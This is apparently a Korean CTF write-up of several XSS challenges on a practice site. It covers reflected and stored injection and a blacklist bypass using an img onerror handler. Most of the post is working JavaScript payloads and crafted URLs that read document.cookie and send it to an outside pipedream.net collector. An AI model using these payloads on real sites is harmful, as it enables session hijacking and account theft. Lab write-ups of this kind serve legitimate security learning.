[CTF] CTF 문제 풀이: XSS

📆 Created: 2024.12.18 Wed

🗓️ Updated: 2024.12.30 Mon

Reading time ~1 minute

XSS 1

notice_list.php

alt text

xss2

notice_list.php의 search 부분 -> reflected xss

            
                ');
let c = document.cookie;
console.log(c);
let i = new Image();
console.log(i);
i.src = "https://eot2jevtyijbm2l.m.pipedream.net/?cookie=" + c;
let tmp=('

link: http://ctf.segfaulthub.com:4343/xss_2/notice_list.php?option_val=username&board_result=');let+c=document.cookie;console.log(c);let+i=new+Image();console.log(i);i.src="https://eoxee0fw4m1u2sw.m.pipedream.net/?cookie="%2Bc;let+tmp=('&board_search=%F0%9F%94%8D&date_from=&date_to=

xss3

notice_list.php의 search 부분은 html entity로 치환

mypage -> reflected xss

            
                <img src=. onerror='
let c=document.cookie;
let i=new Image();
i.src="https://eot2jevtyijbm2l.m.pipedream.net/?cookie="+c;'>

-> %2B

xss4

notice_list -> stored xss

script, alert <- black list filtering <img src=. onerror="prompt(1)">

            
                <img src=. onerror="
let cookie = document.cookie;
let img = new Image();
img.src = 'https://eot2jevtyijbm2l.m.pipedream.net/?cookie=' + cookie;
">

xss5

xss6

login.php

            
                ');
window.onload=function() {
    let c=document.cookie;
    let i=new Image();
i.src="https://eoxee0fw4m1u2sw.m.pipedream.net/?cookie="+c;
};
console.log('

http://ctf.segfaulthub.com:4343/xss_7/login.php?id=1');let+tmp="hello";let+i=new+Image();i.src="https://eoxee0fw4m1u2sw.m.pipedream.net/?cookie="%2Btmp;console.log('&pw=1

/#disqus_thread